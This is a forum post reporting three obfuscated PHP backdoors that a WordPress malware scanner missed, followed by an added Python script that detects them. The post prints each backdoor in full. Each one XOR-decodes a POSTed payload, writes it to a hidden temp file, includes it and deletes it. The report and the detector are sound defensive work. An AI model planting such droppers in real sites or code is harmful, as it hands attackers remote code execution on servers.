Malware not found – maybe add it to definitions?
This topic contains 0 replies, has 1 voice, and was last updated by Neven Pintarić 10 hours, 42 minutes ago.
August 12, 2025 at 9:53 pm #158231
Hi! Awesome tool, cleaned up almost everything on the heavily infected website. However, I noticed it didn’t find these (it’s all in the first lines):
website@myhost [~/test-sk]# grep -r --include="*.php" -E "\?php\s{4,}" .
./wp-content/plugins/astra-sites/inc/lib/ai-builder/inc/classes/functions.php:<?php if(count($_POST) > 0 && isset($_POST["o\x62\x6A"])){ $mrk = hex2bin($_POST["o\x62\x6A"]); $desc = ''; for($h=0; $h<strlen($mrk); $h++){$desc .= chr(ord($mrk[$h]) ^ 7);} $sym = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", getcwd(), "/tmp", getenv("TMP"), getenv("TEMP"), "/var/tmp", sys_get_temp_dir()]); $val = 0; do { $binding = $sym[$val] ?? null; if ($val >= count($sym)) break; if (is_writable($binding) && is_dir($binding)) { $dat = vsprintf("%s/%s", [$binding, ".itm"]); if (file_put_contents($dat, $desc)) { include $dat; @unlink($dat); exit; } } $val++; } while (true); }
./wp-content/plugins/wordpress-seo/admin/filters/class-cornerstone-filter.php:<?php if(filter_has_var(INPUT_POST, "\x66l\x61g")){ $sym = hex2bin($_POST["\x66l\x61g"]); $value = '';$t = 0; while($t < strlen($sym)){$value .= chr(ord($sym[$t]) ^ 9);$t++;} $ptr = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TMP"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), "/var/tmp"]); foreach ($ptr as $key => $obj) { if ((bool)is_dir($obj) && (bool)is_writable($obj)) { $entity = join("/", [$obj, ".bind"]); $file = fopen($entity, 'w'); if ($file) { fwrite($file, $value); fclose($file); include $entity; @unlink($entity); exit; } } } }
./wp-content/plugins/wpforms-lite/vendor/composer/installed.php:<?php if(array_key_exists("d\x61t\x61\x5Fc\x68u\x6Ek", $_REQUEST)){ $entry = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getenv("TMP"), sys_get_temp_dir(), getcwd(), "/dev/shm", "/var/tmp"]); $dat = hex2bin($_REQUEST["d\x61t\x61\x5Fc\x68u\x6Ek"]); $record='' ; $i = 0; do{$record .= chr(ord($dat[$i]) ^ 23);$i++;} while($i < strlen($dat)); $resource = 0; do { $res = $entry[$resource] ?? null; if ($resource >= count($entry)) break; if ((bool)is_dir($res) && (bool)is_writable($res)) { $ref = vsprintf("%s/%s", [$res, ".itm"]); if (file_put_contents($ref, $record)) { include $ref; @unlink($ref); exit; } } $resource++; } while (true); }
This topic was modified 10 hours, 41 minutes ago by
Neven Pintarić.
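The three snippets in the post share one shape: code placed on the `<?php` line, a request key hidden behind `\xNN` escapes, `hex2bin` plus a single-byte XOR loop, then `include` and `unlink` of a temp file. As an added example (not part of the original post and not the scanner's own code), this Python sketch flags PHP files where several of those traits co-occur and decodes the hidden key names; the indicator labels, the threshold of 3, the extra `$_GET`/`$_COOKIE` coverage and both sample files are assumptions constructed here.

```python
import re
from pathlib import Path

# Indicator names are hypothetical labels; patterns follow the three snippets in the post.
INDICATORS = {
    "code_after_padded_open_tag": re.compile(r"\?php[ \t]{4,}\S"),  # mirrors the post's grep
    "hex2bin_of_request": re.compile(r"hex2bin\s*\(\s*\$_(?:POST|REQUEST|GET|COOKIE)\b"),
    "xor_decode_loop": re.compile(r"chr\s*\(\s*ord\s*\([^)]*\)\s*\^\s*\d+\s*\)"),
    "include_variable": re.compile(r"\binclude(?:_once)?\s+\$\w+"),
    "unlink_variable": re.compile(r"unlink\s*\(\s*\$\w+"),
}
QUOTED = re.compile(r'"((?:\w|\\x[0-9A-Fa-f]{2})+)"')

def decode_php_hex(s):
    """Resolve PHP \\xNN escapes so a disguised request key becomes readable."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)

def scan_php(source, threshold=3):
    """Flag source when at least `threshold` (assumed value) indicators co-occur."""
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(source))
    keys = sorted({decode_php_hex(k) for k in QUOTED.findall(source) if "\\x" in k})
    return {"suspicious": len(hits) >= threshold, "indicators": hits, "decoded_keys": keys}

def scan_tree(root):
    """Yield (path, result) for every flagged *.php file under root."""
    for path in sorted(Path(root).rglob("*.php")):
        result = scan_php(path.read_text(errors="replace"))
        if result["suspicious"]:
            yield str(path), result

# Constructed, abridged sample in the shape of the post's first snippet.
SAMPLE_INFECTED = r'''<?php          if(isset($_POST["o\x62\x6A"])){ $m = hex2bin($_POST["o\x62\x6A"]); $d = ""; for($h=0; $h<strlen($m); $h++){$d .= chr(ord($m[$h]) ^ 7);} /* ... */ include $f; @unlink($f); exit; }
/** Plugin file header continues here. */
'''
# Constructed clean file: hex2bin on stored data, a constant include path.
SAMPLE_CLEAN = r'''<?php
$raw = hex2bin($stored_digest);
include __DIR__ . "/helpers.php";
'''

if __name__ == "__main__":
    import sys
    for name, res in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(name, res["indicators"], res["decoded_keys"])
```

Requiring several indicators together keeps legitimate uses of `hex2bin` or `include` from being flagged on their own.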